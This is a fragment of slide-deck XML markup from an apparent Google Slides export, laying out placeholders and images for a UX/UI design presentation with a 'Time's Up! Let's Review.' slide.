          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-133" y="10103933"/>
            <a:ext cx="24377701"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82" name="Google Shape;882;p69"/>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9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="67" y="11565667"/>
            <a:ext cx="24377701"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884" name="Google Shape;884;p69"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1275"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="3124233"/>
            <a:ext cx="1389526" cy="1056315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="885" name="Google Shape;885;p69"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1275"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="4559067"/>
            <a:ext cx="1389526" cy="1056316"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="886" name="Google Shape;886;p69"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1275"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="5881600"/>
            <a:ext cx="1389526" cy="1056315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="887" name="Google Shape;887;p69"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1275"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="7347100"/>
            <a:ext cx="1389526" cy="1056316"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="888" name="Google Shape;888;p69"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1275"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="8740767"/>
            <a:ext cx="1389526" cy="1056315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="889" name="Google Shape;889;p69"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1616" b="1615"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="10119360"/>
            <a:ext cx="1388917" cy="1048512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="890" name="Google Shape;890;p69"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1616" b="1615"/>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1"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="892" name="Google Shape;892;p70"/>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93" name="Google Shape;893;p70"/>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894" name="Google Shape;894;p70"/>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895" name="Google Shape;895;p7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896" name="Google Shape;896;p70"/>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897" name="Google Shape;897;p7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98" name="Google Shape;898;p7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70"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-65583" y="10328200"/>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0" name="Google Shape;900;p7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70"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="11496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2" name="Google Shape;902;p7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70"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-400" y="7991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4" name="Google Shape;904;p7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70"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="9159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6" name="Google Shape;906;p7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70"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-65916" y="5694333"/>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8" name="Google Shape;908;p7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70"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6862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10" name="Google Shape;910;p7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70"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3357333"/>
            <a:ext cx="229155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12" name="Google Shape;912;p7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70"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4525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914" name="Google Shape;914;p7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15" name="Google Shape;915;p70"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1047" b="1036"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="4559808"/>
            <a:ext cx="1267637" cy="963655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="916" name="Google Shape;916;p7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17" name="Google Shape;917;p70"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1047" b="1036"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="6872808"/>
            <a:ext cx="1267637" cy="963655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="918" name="Google Shape;918;p7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19" name="Google Shape;919;p70"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1047" b="1036"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="9168384"/>
            <a:ext cx="1267637" cy="963655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="920" name="Google Shape;920;p7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1" name="Google Shape;921;p70"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1047" b="1036"/>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2"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="923" name="Google Shape;923;p71"/>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24" name="Google Shape;924;p71"/>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925" name="Google Shape;925;p71"/>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926" name="Google Shape;926;p7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927" name="Google Shape;927;p71"/>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928" name="Google Shape;928;p7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29" name="Google Shape;929;p7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71"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-65583" y="10328200"/>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1" name="Google Shape;931;p7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71"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="11496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3" name="Google Shape;933;p7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71"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-400" y="7991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5" name="Google Shape;935;p7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71"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="9159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7" name="Google Shape;937;p7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71"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-65916" y="5694333"/>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9" name="Google Shape;939;p7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71"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6862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41" name="Google Shape;941;p7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71"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3357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43" name="Google Shape;943;p7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71"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4525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945" name="Google Shape;945;p71"/>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46" name="Google Shape;946;p71"/>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47" name="Google Shape;947;p71"/>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48" name="Google Shape;948;p71"/>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49" name="Google Shape;949;p71"/>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0" name="Google Shape;950;p71"/>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1" name="Google Shape;951;p71"/>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2" name="Google Shape;952;p71"/>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53"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="954" name="Google Shape;954;p72"/>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55" name="Google Shape;955;p72"/>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956" name="Google Shape;956;p72"/>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957" name="Google Shape;957;p7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958" name="Google Shape;958;p72"/>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959" name="Google Shape;959;p7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0" name="Google Shape;960;p7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72"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-65583" y="10328200"/>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2" name="Google Shape;962;p7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72"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="11496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4" name="Google Shape;964;p7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72"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-400" y="7991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6" name="Google Shape;966;p7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72"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="9159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8" name="Google Shape;968;p7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72"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-65916" y="5694333"/>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70" name="Google Shape;970;p7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72"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6862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72" name="Google Shape;972;p7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72"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3357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74" name="Google Shape;974;p7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72"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4525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976" name="Google Shape;976;p72"/>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77" name="Google Shape;977;p72"/>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78" name="Google Shape;978;p72"/>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79" name="Google Shape;979;p72"/>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0" name="Google Shape;980;p72"/>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1" name="Google Shape;981;p72"/>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2" name="Google Shape;982;p72"/>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83" name="Google Shape;983;p72"/>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84"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985" name="Google Shape;985;p73"/>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86" name="Google Shape;986;p73"/>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987" name="Google Shape;987;p73"/>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988" name="Google Shape;988;p7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989" name="Google Shape;989;p73"/>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990" name="Google Shape;990;p7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91" name="Google Shape;991;p73"/>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73"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-65583" y="10328200"/>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93" name="Google Shape;993;p73"/>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73"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="11496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95" name="Google Shape;995;p73"/>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73"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-400" y="7991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97" name="Google Shape;997;p73"/>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73"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="9159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99" name="Google Shape;999;p73"/>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73"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-65916" y="5694333"/>
            <a:ext cx="24377701"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01" name="Google Shape;1001;p73"/>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73"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6862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03" name="Google Shape;1003;p73"/>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73"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3357333"/>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05" name="Google Shape;1005;p73"/>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73"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4525667"/>
            <a:ext cx="24377701"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007" name="Google Shape;1007;p73"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1275"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="3364992"/>
            <a:ext cx="1267638" cy="963655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1008" name="Google Shape;1008;p73"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1275"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="4559808"/>
            <a:ext cx="1267638" cy="963655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1009" name="Google Shape;1009;p73"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1275"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="5677992"/>
            <a:ext cx="1267638" cy="963655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1010" name="Google Shape;1010;p73"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1275"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="6872808"/>
            <a:ext cx="1267638" cy="963655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1011" name="Google Shape;1011;p73"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1275"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="7997952"/>
            <a:ext cx="1267638" cy="963655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1012" name="Google Shape;1012;p73"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1275"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="9168384"/>
            <a:ext cx="1267638" cy="963655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1013" name="Google Shape;1013;p73"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1275"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="10338816"/>
            <a:ext cx="1267638" cy="963655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1014" name="Google Shape;1014;p73"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1275"/>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15"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1016" name="Google Shape;1016;p74"/>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017" name="Google Shape;1017;p7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56"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="57" name="Google Shape;57;p3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58" name="Google Shape;58;p30"/>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UX/UI Design</a:t>
            </a:r>
            <a:endParaRPr sz="4800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="60" name="Google Shape;60;p30"/>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61" name="Google Shape;61;p3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2" name="Google Shape;62;p3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3" name="Google Shape;63;p3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64" name="Google Shape;64;p30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1558888" y="2822800"/>
            <a:ext cx="6825749" cy="5119304"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Google Shape;65;p3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18"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1019" name="Google Shape;1019;p7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0" name="Google Shape;1020;p7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21" name="Google Shape;1021;p7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22" name="Google Shape;1022;p75"/>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rgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Time’s Up! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="9600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Let’s Review.</a:t>
            </a:r>
            <a:endParaRPr sz="9600" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
